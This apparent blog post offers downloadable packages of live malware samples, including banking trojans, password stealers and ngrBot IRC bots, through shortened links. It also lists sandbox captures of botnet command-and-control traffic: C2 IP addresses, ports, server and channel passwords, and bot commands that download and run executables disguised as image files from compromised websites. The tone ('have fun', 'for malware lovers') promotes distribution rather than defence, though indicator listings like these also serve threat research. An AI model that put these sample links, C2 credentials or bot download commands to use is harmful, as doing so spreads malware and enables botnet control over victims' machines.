Here we go another malwares package around 50mb with banking trojans irc bots(ngrBot samples) have fun Download: http://adf.ly/2Gd5i
Unix.ArabChat.Net(irc botnet hosted in United States Edison Lomag Internet Services Llc)
Remote Host Port Number 208.185.80.73 6667 NICK n-251662 USER gtytcsb 0 0 :n-251662 JOIN #jon PONG :UAE.ArabChat.Net USERHOST n-251662 MODE n-251662 -x+B hosting infso: http://whois.domaintools.com/208.185.80.73
91.211.117.18(ngrBot hosted in Ukraine Zharkov Mukola Mukolayovuch)
Remote Host Port Number 213.251.170.52 80 91.211.117.18 1865 PASS ngrBot Now talking in #main Topic On: [ #main ] [ .up http://creatucurso.net/wp-admin/error_log.exe 32c92e5db2642cd842d7efcccb758889 -r ] Topic By: [ DCD ] hosting infso: http://whois.domaintools.com/91.211.117.18
www.ircperu.com(ngrBot hosted in Russian Federation Oao Webalta)
www.ircperu.com DNS_TYPE_A 92.241.165.160 92.241.165.160:1863 Nick: n{AT|XPa}plexwne Username: plexwne Server Pass: ngrBot Joined Channel: #IrcPeru with Password PeruRulz!! Channel Topic for Channel #IrcPeru: “.up http://formulasymanuales.net/images/modules/smiley/thumbsup.gif.exe 0e2faa16ba5ab03e7ab4102497e2fb8f , .mdns http://www.wellnessfarm-shop.de/shop/thumbs.txt” Private Message to Channel #IrcPeru: “[DNS]: Blocked 0 domain(s) – Redirected 34 domain(s)” UPDATE: ircperu.com:1863 Remote Host Port Number 141.105.66.247 1863 PASS ngrBot NICK n{US|XPa}uxfxodg USER uxfxodgRead more...
server.boyrules.com(irc botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number 205.234.231.54 2345 NICK [USA|00|P|20878] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-3951 * 0 :COMPUTERNAME MODE [USA|00|P|20878] -ix JOIN #!loco! PONG 22 MOTD hosting infso: http://whois.domaintools.com/205.234.231.54
92.241.165.134(ngrBot hosted in Russian Federation Oao Webalta)
Remote Host Port Number 200.122.132.122 80 213.251.170.52 80 81.169.145.73 80 92.241.165.134 7654 PASS ngrBot NICK n{US|XPa}bbvvotv USER bbvvotv 0 0 :bbvvotv JOIN #oldgold noKIDs PRIVMSG #oldgold :[d=”http://coopeande5.com/imagenes/principal.jpg.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataWcxaxw.exe” – Download retries: 0 PRIVMSG #oldgold :[DNS]: Blocked 0 domain(s) – Redirected 10 domain(s) UPDATE: PRIVMSG #oldgold :[DNS]: BlockedRead more...
Packed.Win32.Katusha(malware hosted in Netherlands Amsterdam Nforce Entertainment B.v)
dq.javagames7.com Resolved : [ dq.javagames7.com ] To [ 109.201.135.61 ] Resolved : [ dq.javagames7.com ] To [ 109.201.135.60 ] Resolved : [ dq.javagames7.com ] To [ 109.201.135.62 ] Resolved : [ dq.javagames7.com ] To [ 109.201.135.63 ] – TCP Connection Attempts: 109.201.135.63:8800 109.201.135.61:8800 109.201.135.62:8800 109.201.135.60:8800 exe file: http://31.184.237.180/dqs.exe hosting infos: http://whois.domaintools.com/109.201.135.63
92.243.4.133(modified DCI bot hosted in France Gandi)
3 websites use this address. (examples: btcminers.biz labekaa.com xety.fr) Remote Host Port Number 92.243.4.133 5900 PASS Virus channel #3new# NICK VirUs-ymurahxw USER VirUs “” “gyf” : 8Coded 8VirUs.. NICK VirUs-urxuktmo USER VirUs “” “gux” : hosting infos: http://whois.domaintools.com/92.243.4.133
46.20.40.193(ngrBot hosted in Germany Myloc Managed It Ag)
Remote Host Port Number 213.251.170.52 80 46.20.40.193 1337 PASS ngrBot NICK n{US|XPa}lqosuhk USER lqosuhk 0 0 :lqosuhk JOIN #ngr ngrBot PONG :Astros.GoV Now talking in #ngr Topic On : [ #ngr ] [ !mod pdef on ] Topic By : [ Astros ] hosting infos: http://whois.domaintools.com/46.20.40.193
40mb malware samples
Here again with another package for malware lovers most of them are baking trojans passwords stealers and irc bots Download: http://adf.ly/2CVhM